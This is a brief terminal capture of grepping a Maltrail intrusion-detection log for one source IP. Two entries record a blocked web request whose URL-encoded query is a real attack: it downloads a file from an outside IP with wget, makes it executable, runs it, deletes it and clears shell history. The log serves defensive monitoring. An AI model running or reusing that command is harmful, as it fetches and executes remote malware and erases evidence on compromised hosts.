rootl:/var/log/maltrail# cat /var/log/maltrail/2022-07-10.log | egrep '(malware|tor exit|leakage|scan|attack|reputation|code)'|grep 45.61.185.76
"2022-07-10 04:13:11.375192" l 45.61.185.76 42122 172.16.1.1 80 TCP URL 80.59.197.13(/shell?cd%20%2ftmp%3bwget%20http%3a%2f%2f103.147.122.68%2f.3%20-o%20fnu%3bchmod%20777%20fnu%3bsh%20fnu%3brm%20-rf%20fnu%3bhistory%20-w%3bhistory%20-c) "potential remote code execution (suspicious)" (heuristic)
"2022-07-10 04:13:11.375257" l 45.61.185.76 42122 192.168.1.175 80 TCP URL 80.59.197.13(/shell?cd%20%2ftmp%3bwget%20http%3a%2f%2f103.147.122.68%2f.3%20-o%20fnu%3bchmod%20777%20fnu%3bsh%20fnu%3brm%20-rf%20fnu%3bhistory%20-w%3bhistory%20-c) "potential remote code execution (suspicious)" (heuristic)

……